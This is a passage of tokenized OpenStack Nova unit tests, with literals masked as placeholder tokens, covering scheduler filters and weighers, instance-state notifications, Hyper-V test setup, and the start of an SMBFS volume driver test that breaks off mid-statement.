test_image_properties_filter_hvm_mode_compat ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_vm_mode = '<STR_LIT>' ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . KVM , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertTrue ( self . filt_cls . 
host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_xen_arch_compat ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_architecture = '<STR_LIT>' ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . I686 , hv_type . KVM , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertTrue ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_xen_hv_type_compat ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> img_hv_type = '<STR_LIT>' ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . I686 , hv_type . XEN , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertTrue ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_baremetal_vmmode_compat ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_vm_mode = '<STR_LIT>' ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . I686 , hv_type . BAREMETAL , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertTrue ( self . filt_cls . host_passes ( host , spec_obj ) ) </s>
<s> """<STR_LIT>""" <EOL> from nova . scheduler import weights <EOL> from nova . scheduler . weights import disk <EOL> from nova import test <EOL> from nova . tests . unit . scheduler import fakes <EOL> class DiskWeigherTestCase ( test . NoDBTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( DiskWeigherTestCase , self ) . setUp ( ) <EOL> self . weight_handler = weights . HostWeightHandler ( ) <EOL> self . weighers = [ disk . DiskWeigher ( ) ] <EOL> def _get_weighed_host ( self , hosts , weight_properties = None ) : <EOL> if weight_properties is None : <EOL> weight_properties = { } <EOL> return self . weight_handler . get_weighed_objects ( self . weighers , <EOL> hosts , weight_properties ) [ <NUM_LIT:0> ] <EOL> def _get_all_hosts ( self ) : <EOL> host_values = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : <NUM_LIT> } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : <NUM_LIT> } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : <NUM_LIT> } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> ] <EOL> return [ fakes . FakeHostState ( host , node , values ) <EOL> for host , node , values in host_values ] <EOL> def test_default_of_spreading_first ( self ) : <EOL> hostinfo_list = self . _get_all_hosts ( ) <EOL> weighed_host = self . _get_weighed_host ( hostinfo_list ) <EOL> self . assertEqual ( <NUM_LIT:1.0> , weighed_host . weight ) <EOL> self . assertEqual ( '<STR_LIT>' , weighed_host . obj . host ) <EOL> def test_disk_filter_multiplier1 ( self ) : <EOL> self . flags ( disk_weight_multiplier = <NUM_LIT:0.0> ) <EOL> hostinfo_list = self . _get_all_hosts ( ) <EOL> weighed_host = self . _get_weighed_host ( hostinfo_list ) <EOL> self . assertEqual ( <NUM_LIT:0.0> , weighed_host . weight ) <EOL> def test_disk_filter_multiplier2 ( self ) : <EOL> self . flags ( disk_weight_multiplier = <NUM_LIT> ) <EOL> hostinfo_list = self . _get_all_hosts ( ) <EOL> weighed_host = self . _get_weighed_host ( hostinfo_list ) <EOL> self . 
assertEqual ( <NUM_LIT:1.0> * <NUM_LIT:2> , weighed_host . weight ) <EOL> self . assertEqual ( '<STR_LIT>' , weighed_host . obj . host ) <EOL> def test_disk_filter_negative ( self ) : <EOL> self . flags ( disk_weight_multiplier = <NUM_LIT:1.0> ) <EOL> hostinfo_list = self . _get_all_hosts ( ) <EOL> host_attr = { '<STR_LIT:id>' : <NUM_LIT:100> , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : - <NUM_LIT> } <EOL> host_state = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , host_attr ) <EOL> hostinfo_list = list ( hostinfo_list ) + [ host_state ] <EOL> weights = self . weight_handler . get_weighed_objects ( self . weighers , <EOL> hostinfo_list , { } ) <EOL> weighed_host = weights [ <NUM_LIT:0> ] <EOL> self . assertEqual ( <NUM_LIT:1> , weighed_host . weight ) <EOL> self . assertEqual ( '<STR_LIT>' , weighed_host . obj . host ) <EOL> weighed_host = weights [ - <NUM_LIT:1> ] <EOL> self . assertEqual ( <NUM_LIT:0> , weighed_host . weight ) <EOL> self . assertEqual ( '<STR_LIT>' , weighed_host . obj . host ) </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> import mock <EOL> from oslo_context import context as o_context <EOL> from oslo_context import fixture as o_fixture <EOL> from nova . compute import flavors <EOL> from nova . compute import task_states <EOL> from nova . compute import vm_states <EOL> from nova import context <EOL> from nova import exception <EOL> from nova import notifications <EOL> from nova import objects <EOL> from nova . objects import base as obj_base <EOL> from nova import test <EOL> from nova . tests . unit import fake_network <EOL> from nova . tests . unit import fake_notifier <EOL> class NotificationsTestCase ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( NotificationsTestCase , self ) . setUp ( ) <EOL> self . fixture = self . useFixture ( o_fixture . ClearRequestContext ( ) ) <EOL> self . net_info = fake_network . fake_get_instance_nw_info ( self , <NUM_LIT:1> , <EOL> <NUM_LIT:1> ) <EOL> def fake_get_nw_info ( cls , ctxt , instance ) : <EOL> self . assertTrue ( ctxt . is_admin ) <EOL> return self . net_info <EOL> self . stub_out ( '<STR_LIT>' , <EOL> fake_get_nw_info ) <EOL> fake_network . set_stub_network_methods ( self ) <EOL> fake_notifier . stub_notifier ( self . stubs ) <EOL> self . addCleanup ( fake_notifier . reset ) <EOL> self . flags ( compute_driver = '<STR_LIT>' , <EOL> network_manager = '<STR_LIT>' , <EOL> notify_on_state_change = "<STR_LIT>" , <EOL> host = '<STR_LIT>' ) <EOL> self . flags ( api_servers = [ '<STR_LIT>' ] , group = '<STR_LIT>' ) <EOL> self . user_id = '<STR_LIT>' <EOL> self . project_id = '<STR_LIT>' <EOL> self . context = context . RequestContext ( self . user_id , self . project_id ) <EOL> self . instance = self . _wrapped_create ( ) <EOL> self . decorated_function_called = False <EOL> def _wrapped_create ( self , params = None ) : <EOL> instance_type = flavors . get_flavor_by_name ( '<STR_LIT>' ) <EOL> inst = objects . Instance ( image_ref = <NUM_LIT:1> , <EOL> user_id = self . 
user_id , <EOL> project_id = self . project_id , <EOL> instance_type_id = instance_type [ '<STR_LIT:id>' ] , <EOL> root_gb = <NUM_LIT:0> , <EOL> ephemeral_gb = <NUM_LIT:0> , <EOL> access_ip_v4 = '<STR_LIT>' , <EOL> access_ip_v6 = '<STR_LIT>' , <EOL> display_name = '<STR_LIT>' , <EOL> hostname = '<STR_LIT>' , <EOL> node = '<STR_LIT>' , <EOL> system_metadata = { } ) <EOL> inst . _context = self . context <EOL> if params : <EOL> inst . update ( params ) <EOL> inst . flavor = instance_type <EOL> inst . create ( ) <EOL> return inst <EOL> def test_send_api_fault_disabled ( self ) : <EOL> self . flags ( notify_api_faults = False ) <EOL> notifications . send_api_fault ( "<STR_LIT>" , <NUM_LIT> , None ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> def test_send_api_fault ( self ) : <EOL> self . flags ( notify_api_faults = True ) <EOL> exception = None <EOL> try : <EOL> raise test . TestingException ( "<STR_LIT>" ) <EOL> except test . TestingException as e : <EOL> exception = e <EOL> notifications . send_api_fault ( "<STR_LIT>" , <NUM_LIT> , exception ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> n = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> self . assertEqual ( n . priority , '<STR_LIT>' ) <EOL> self . assertEqual ( n . event_type , '<STR_LIT>' ) <EOL> self . assertEqual ( n . payload [ '<STR_LIT:url>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( n . payload [ '<STR_LIT:status>' ] , <NUM_LIT> ) <EOL> self . assertIsNotNone ( n . payload [ '<STR_LIT>' ] ) <EOL> def test_send_api_fault_fresh_context ( self ) : <EOL> self . flags ( notify_api_faults = True ) <EOL> exception = None <EOL> try : <EOL> raise test . TestingException ( "<STR_LIT>" ) <EOL> except test . TestingException as e : <EOL> exception = e <EOL> ctxt = context . RequestContext ( overwrite = True ) <EOL> notifications . send_api_fault ( "<STR_LIT>" , <NUM_LIT> , exception ) <EOL> self . 
assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> n = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> self . assertEqual ( n . priority , '<STR_LIT>' ) <EOL> self . assertEqual ( n . event_type , '<STR_LIT>' ) <EOL> self . assertEqual ( n . payload [ '<STR_LIT:url>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( n . payload [ '<STR_LIT:status>' ] , <NUM_LIT> ) <EOL> self . assertIsNotNone ( n . payload [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( ctxt , n . context ) <EOL> def test_send_api_fault_fake_context ( self ) : <EOL> self . flags ( notify_api_faults = True ) <EOL> exception = None <EOL> try : <EOL> raise test . TestingException ( "<STR_LIT>" ) <EOL> except test . TestingException as e : <EOL> exception = e <EOL> ctxt = o_context . get_current ( ) <EOL> self . assertIsNotNone ( ctxt ) <EOL> notifications . send_api_fault ( "<STR_LIT>" , <NUM_LIT> , exception ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> n = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> self . assertEqual ( n . priority , '<STR_LIT>' ) <EOL> self . assertEqual ( n . event_type , '<STR_LIT>' ) <EOL> self . assertEqual ( n . payload [ '<STR_LIT:url>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( n . payload [ '<STR_LIT:status>' ] , <NUM_LIT> ) <EOL> self . assertIsNotNone ( n . payload [ '<STR_LIT>' ] ) <EOL> self . assertIsNotNone ( n . context ) <EOL> self . assertEqual ( ctxt , n . context ) <EOL> def test_send_api_fault_admin_context ( self ) : <EOL> self . flags ( notify_api_faults = True ) <EOL> exception = None <EOL> try : <EOL> raise test . TestingException ( "<STR_LIT>" ) <EOL> except test . TestingException as e : <EOL> exception = e <EOL> self . fixture . _remove_cached_context ( ) <EOL> self . assertIsNone ( o_context . get_current ( ) ) <EOL> notifications . send_api_fault ( "<STR_LIT>" , <NUM_LIT> , exception ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . 
NOTIFICATIONS ) ) <EOL> n = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> self . assertEqual ( n . priority , '<STR_LIT>' ) <EOL> self . assertEqual ( n . event_type , '<STR_LIT>' ) <EOL> self . assertEqual ( n . payload [ '<STR_LIT:url>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( n . payload [ '<STR_LIT:status>' ] , <NUM_LIT> ) <EOL> self . assertIsNotNone ( n . payload [ '<STR_LIT>' ] ) <EOL> self . assertIsNotNone ( n . context ) <EOL> self . assertTrue ( n . context . is_admin ) <EOL> def test_notif_disabled ( self ) : <EOL> self . flags ( notify_on_state_change = None ) <EOL> old = copy . copy ( self . instance ) <EOL> self . instance . vm_state = vm_states . ACTIVE <EOL> old_vm_state = old [ '<STR_LIT>' ] <EOL> new_vm_state = self . instance . vm_state <EOL> old_task_state = old [ '<STR_LIT>' ] <EOL> new_task_state = self . instance . task_state <EOL> notifications . send_update_with_states ( self . context , self . instance , <EOL> old_vm_state , new_vm_state , old_task_state , new_task_state , <EOL> verify_states = True ) <EOL> notifications . send_update ( self . context , old , self . instance ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> def test_task_notif ( self ) : <EOL> self . flags ( notify_on_state_change = "<STR_LIT>" ) <EOL> old = copy . copy ( self . instance ) <EOL> self . instance . task_state = task_states . SPAWNING <EOL> old_vm_state = old [ '<STR_LIT>' ] <EOL> new_vm_state = self . instance . vm_state <EOL> old_task_state = old [ '<STR_LIT>' ] <EOL> new_task_state = self . instance . task_state <EOL> notifications . send_update_with_states ( self . context , self . instance , <EOL> old_vm_state , new_vm_state , old_task_state , new_task_state , <EOL> verify_states = True ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> self . flags ( notify_on_state_change = "<STR_LIT>" ) <EOL> notifications . send_update ( self . context , old , self . 
instance ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> def test_send_no_notif ( self ) : <EOL> old_vm_state = self . instance . vm_state <EOL> new_vm_state = self . instance . vm_state <EOL> old_task_state = self . instance . task_state <EOL> new_task_state = self . instance . task_state <EOL> notifications . send_update_with_states ( self . context , self . instance , <EOL> old_vm_state , new_vm_state , old_task_state , new_task_state , <EOL> service = "<STR_LIT>" , host = None , verify_states = True ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> def test_send_on_vm_change ( self ) : <EOL> old = obj_base . obj_to_primitive ( self . instance ) <EOL> old [ '<STR_LIT>' ] = None <EOL> self . instance . vm_state = vm_states . ACTIVE <EOL> notifications . send_update ( self . context , old , self . instance ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> notif = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , notif . publisher_id ) <EOL> def test_send_on_task_change ( self ) : <EOL> old = obj_base . obj_to_primitive ( self . instance ) <EOL> old [ '<STR_LIT>' ] = None <EOL> self . instance . task_state = task_states . SPAWNING <EOL> notifications . send_update ( self . context , old , self . instance ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> def test_no_update_with_states ( self ) : <EOL> notifications . send_update_with_states ( self . context , self . instance , <EOL> vm_states . BUILDING , vm_states . BUILDING , task_states . SPAWNING , <EOL> task_states . SPAWNING , verify_states = True ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> def test_vm_update_with_states ( self ) : <EOL> notifications . send_update_with_states ( self . context , self . instance , <EOL> vm_states . BUILDING , vm_states . 
ACTIVE , task_states . SPAWNING , <EOL> task_states . SPAWNING , verify_states = True ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> notif = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> payload = notif . payload <EOL> access_ip_v4 = str ( self . instance . access_ip_v4 ) <EOL> access_ip_v6 = str ( self . instance . access_ip_v6 ) <EOL> display_name = self . instance . display_name <EOL> hostname = self . instance . hostname <EOL> node = self . instance . node <EOL> self . assertEqual ( vm_states . BUILDING , payload [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( vm_states . ACTIVE , payload [ "<STR_LIT:state>" ] ) <EOL> self . assertEqual ( task_states . SPAWNING , payload [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( task_states . SPAWNING , payload [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , access_ip_v4 ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , access_ip_v6 ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , display_name ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , hostname ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , node ) <EOL> def test_task_update_with_states ( self ) : <EOL> self . flags ( notify_on_state_change = "<STR_LIT>" ) <EOL> notifications . send_update_with_states ( self . context , self . instance , <EOL> vm_states . BUILDING , vm_states . BUILDING , task_states . SPAWNING , <EOL> None , verify_states = True ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> notif = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> payload = notif . payload <EOL> access_ip_v4 = str ( self . instance . access_ip_v4 ) <EOL> access_ip_v6 = str ( self . instance . access_ip_v6 ) <EOL> display_name = self . instance . display_name <EOL> hostname = self . instance . hostname <EOL> self . assertEqual ( vm_states . BUILDING , payload [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( vm_states . 
BUILDING , payload [ "<STR_LIT:state>" ] ) <EOL> self . assertEqual ( task_states . SPAWNING , payload [ "<STR_LIT>" ] ) <EOL> self . assertIsNone ( payload [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , access_ip_v4 ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , access_ip_v6 ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , display_name ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , hostname ) <EOL> def test_update_no_service_name ( self ) : <EOL> notifications . send_update_with_states ( self . context , self . instance , <EOL> vm_states . BUILDING , vm_states . BUILDING , task_states . SPAWNING , <EOL> None ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> notif = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , notif . publisher_id ) <EOL> def test_update_with_service_name ( self ) : <EOL> notifications . send_update_with_states ( self . context , self . instance , <EOL> vm_states . BUILDING , vm_states . BUILDING , task_states . SPAWNING , <EOL> None , service = "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> notif = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , notif . publisher_id ) <EOL> def test_update_with_host_name ( self ) : <EOL> notifications . send_update_with_states ( self . context , self . instance , <EOL> vm_states . BUILDING , vm_states . BUILDING , task_states . SPAWNING , <EOL> None , host = "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> notif = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , notif . publisher_id ) <EOL> def test_payload_has_fixed_ip_labels ( self ) : <EOL> info = notifications . info_from_instance ( self . context , self . instance , <EOL> self . net_info , None ) <EOL> self . assertIn ( "<STR_LIT>" , info ) <EOL> self . 
assertEqual ( info [ "<STR_LIT>" ] [ <NUM_LIT:0> ] [ "<STR_LIT:label>" ] , "<STR_LIT>" ) <EOL> def test_payload_has_vif_mac_address ( self ) : <EOL> info = notifications . info_from_instance ( self . context , self . instance , <EOL> self . net_info , None ) <EOL> self . assertIn ( "<STR_LIT>" , info ) <EOL> self . assertEqual ( self . net_info [ <NUM_LIT:0> ] [ '<STR_LIT:address>' ] , <EOL> info [ "<STR_LIT>" ] [ <NUM_LIT:0> ] [ "<STR_LIT>" ] ) <EOL> def test_payload_has_cell_name_empty ( self ) : <EOL> info = notifications . info_from_instance ( self . context , self . instance , <EOL> self . net_info , None ) <EOL> self . assertIn ( "<STR_LIT>" , info ) <EOL> self . assertIsNone ( self . instance . cell_name ) <EOL> self . assertEqual ( "<STR_LIT>" , info [ "<STR_LIT>" ] ) <EOL> def test_payload_has_cell_name ( self ) : <EOL> self . instance . cell_name = "<STR_LIT>" <EOL> info = notifications . info_from_instance ( self . context , self . instance , <EOL> self . net_info , None ) <EOL> self . assertIn ( "<STR_LIT>" , info ) <EOL> self . assertEqual ( "<STR_LIT>" , info [ "<STR_LIT>" ] ) <EOL> def test_payload_has_progress_empty ( self ) : <EOL> info = notifications . info_from_instance ( self . context , self . instance , <EOL> self . net_info , None ) <EOL> self . assertIn ( "<STR_LIT>" , info ) <EOL> self . assertIsNone ( self . instance . progress ) <EOL> self . assertEqual ( "<STR_LIT>" , info [ "<STR_LIT>" ] ) <EOL> def test_payload_has_progress ( self ) : <EOL> self . instance . progress = <NUM_LIT:50> <EOL> info = notifications . info_from_instance ( self . context , self . instance , <EOL> self . net_info , None ) <EOL> self . assertIn ( "<STR_LIT>" , info ) <EOL> self . assertEqual ( <NUM_LIT:50> , info [ "<STR_LIT>" ] ) <EOL> def test_send_access_ip_update ( self ) : <EOL> notifications . send_update ( self . context , self . instance , self . instance ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . 
NOTIFICATIONS ) ) <EOL> notif = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> payload = notif . payload <EOL> access_ip_v4 = str ( self . instance . access_ip_v4 ) <EOL> access_ip_v6 = str ( self . instance . access_ip_v6 ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , access_ip_v4 ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , access_ip_v6 ) <EOL> def test_send_name_update ( self ) : <EOL> param = { "<STR_LIT>" : "<STR_LIT>" } <EOL> new_name_inst = self . _wrapped_create ( params = param ) <EOL> notifications . send_update ( self . context , self . instance , new_name_inst ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> notif = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> payload = notif . payload <EOL> old_display_name = self . instance . display_name <EOL> new_display_name = new_name_inst . display_name <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , old_display_name ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , new_display_name ) <EOL> def test_send_no_state_change ( self ) : <EOL> called = [ False ] <EOL> def sending_no_state_change ( context , instance , ** kwargs ) : <EOL> called [ <NUM_LIT:0> ] = True <EOL> self . stub_out ( '<STR_LIT>' , <EOL> sending_no_state_change ) <EOL> notifications . send_update ( self . context , self . instance , self . instance ) <EOL> self . assertTrue ( called [ <NUM_LIT:0> ] ) <EOL> def test_fail_sending_update ( self ) : <EOL> def fail_sending ( context , instance , ** kwargs ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> self . stub_out ( '<STR_LIT>' , <EOL> fail_sending ) <EOL> notifications . send_update ( self . context , self . instance , self . instance ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> @ mock . patch . object ( notifications . LOG , '<STR_LIT>' ) <EOL> def test_fail_sending_update_instance_not_found ( self , mock_log_exception ) : <EOL> notfound = exception . 
InstanceNotFound ( instance_id = self . instance . uuid ) <EOL> with mock . patch . object ( notifications , <EOL> '<STR_LIT>' , <EOL> side_effect = notfound ) : <EOL> notifications . send_update ( <EOL> self . context , self . instance , self . instance ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , mock_log_exception . call_count ) <EOL> @ mock . patch . object ( notifications . LOG , '<STR_LIT>' ) <EOL> def test_fail_send_update_with_states_inst_not_found ( self , <EOL> mock_log_exception ) : <EOL> notfound = exception . InstanceNotFound ( instance_id = self . instance . uuid ) <EOL> with mock . patch . object ( notifications , <EOL> '<STR_LIT>' , <EOL> side_effect = notfound ) : <EOL> notifications . send_update_with_states ( <EOL> self . context , self . instance , <EOL> vm_states . BUILDING , vm_states . ERROR , <EOL> task_states . NETWORKING , new_task_state = None ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , mock_log_exception . call_count ) <EOL> def _decorated_function ( self , arg1 , arg2 ) : <EOL> self . decorated_function_called = True <EOL> def test_notify_decorator ( self ) : <EOL> func_name = self . _decorated_function . __name__ <EOL> self . _decorated_function = notifications . notify_decorator ( <EOL> func_name , <EOL> self . _decorated_function ) <EOL> ctxt = o_context . RequestContext ( ) <EOL> self . _decorated_function ( <NUM_LIT:1> , ctxt ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> n = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> self . assertEqual ( n . priority , '<STR_LIT>' ) <EOL> self . assertEqual ( n . event_type , func_name ) <EOL> self . assertEqual ( n . context , ctxt ) <EOL> self . assertTrue ( self . decorated_function_called ) <EOL> class NotificationsFormatTestCase ( test . 
NoDBTestCase ) : <EOL> def test_state_computation ( self ) : <EOL> instance = { '<STR_LIT>' : mock . sentinel . vm_state , <EOL> '<STR_LIT>' : mock . sentinel . task_state } <EOL> states = notifications . _compute_states_payload ( instance ) <EOL> self . assertEqual ( mock . sentinel . vm_state , states [ '<STR_LIT:state>' ] ) <EOL> self . assertEqual ( mock . sentinel . vm_state , states [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( mock . sentinel . task_state , states [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( mock . sentinel . task_state , states [ '<STR_LIT>' ] ) <EOL> states = notifications . _compute_states_payload ( <EOL> instance , <EOL> old_vm_state = mock . sentinel . old_vm_state , <EOL> ) <EOL> self . assertEqual ( mock . sentinel . vm_state , states [ '<STR_LIT:state>' ] ) <EOL> self . assertEqual ( mock . sentinel . old_vm_state , states [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( mock . sentinel . task_state , states [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( mock . sentinel . task_state , states [ '<STR_LIT>' ] ) <EOL> states = notifications . _compute_states_payload ( <EOL> instance , <EOL> old_vm_state = mock . sentinel . old_vm_state , <EOL> old_task_state = mock . sentinel . old_task_state , <EOL> new_vm_state = mock . sentinel . new_vm_state , <EOL> new_task_state = mock . sentinel . new_task_state , <EOL> ) <EOL> self . assertEqual ( mock . sentinel . new_vm_state , states [ '<STR_LIT:state>' ] ) <EOL> self . assertEqual ( mock . sentinel . old_vm_state , states [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( mock . sentinel . old_task_state , <EOL> states [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( mock . sentinel . new_task_state , <EOL> states [ '<STR_LIT>' ] ) </s>
<s> import mock <EOL> from os_win import utilsfactory <EOL> from six . moves import builtins <EOL> from nova import test <EOL> class HyperVBaseTestCase ( test . NoDBTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( HyperVBaseTestCase , self ) . setUp ( ) <EOL> self . _mock_wmi = mock . MagicMock ( ) <EOL> wmi_patcher = mock . patch . object ( builtins , '<STR_LIT>' , create = True , <EOL> new = self . _mock_wmi ) <EOL> platform_patcher = mock . patch ( '<STR_LIT>' , '<STR_LIT:win32>' ) <EOL> utilsfactory_patcher = mock . patch . object ( utilsfactory , '<STR_LIT>' ) <EOL> platform_patcher . start ( ) <EOL> wmi_patcher . start ( ) <EOL> utilsfactory_patcher . start ( ) <EOL> self . addCleanup ( wmi_patcher . stop ) <EOL> self . addCleanup ( platform_patcher . stop ) <EOL> self . addCleanup ( utilsfactory_patcher . stop ) </s>
<s> import os <EOL> import mock <EOL> from nova . tests . unit . virt . libvirt . volume import test_volume <EOL> from nova import utils <EOL> from nova . virt . libvirt import utils as libvirt_utils <EOL> from nova . virt . libvirt . volume import smbfs <EOL> class LibvirtSMBFSVolumeDriverTestCase ( test_volume . LibvirtVolumeBaseTestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( LibvirtSMBFSVolumeDriverTestCase , self ) . setUp ( ) <EOL> self . mnt_base = '<STR_LIT>' <EOL> self . flags ( smbfs_mount_point_base = self . mnt_base , group = '<STR_LIT>' ) <EOL> @ mock . patch . object ( libvirt_utils , '<STR_LIT>' ) <EOL> def test_libvirt_smbfs_driver ( self , mock_is_mounted ) : <EOL> mock_is_mounted . return_value = False <EOL> libvirt_driver = smbfs . LibvirtSMBFSVolumeDriver ( self . fake_conn ) <EOL> export_string = '<STR_LIT>' <EOL> export_mnt_base = os . path . join ( self . mnt_base , <EOL> utils . get_hash_str ( export_string ) ) <EOL> connection_info = { '<STR_LIT:data>' : { '<STR_LIT>' : export_string , <EOL> '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT>' : None } } <EOL> libvirt_driver . connect_volume ( connection_info , self . disk_info ) <EOL> libvirt_driver . disconnect_volume ( connection_info , "<STR_LIT>" ) <EOL> expected_commands = 